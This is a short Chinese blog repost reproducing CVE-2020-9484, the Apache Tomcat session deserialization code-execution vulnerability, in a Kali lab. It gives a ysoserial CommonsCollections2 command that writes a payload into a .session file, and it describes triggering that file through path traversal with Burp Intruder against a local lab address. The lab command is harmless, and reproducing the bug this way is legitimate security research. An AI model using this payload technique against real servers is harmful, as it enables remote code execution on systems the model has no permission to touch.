Apache #Tomcat CVE-2020-9484

CVE-2020-9484

用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 CVE-2020-9484

环境:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar)

启动

/yourtomcatdir/bin/startup.sh 

生成payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

利用

先访问S2-053看是否启动正常: http://192.168.152.128:8080/s2-053/ 


重新访问抓包,用intruder进行路径遍历 


执行命令成功: 

https://github.com/IdealDreamLast/CVE-2020-9484/raw/master/img/ok.png

本文转自https://github.com/IdealDreamLast/CVE-2020-9484/

原文地址:https://www.cnblogs.com/xyongsec/p/13175132.html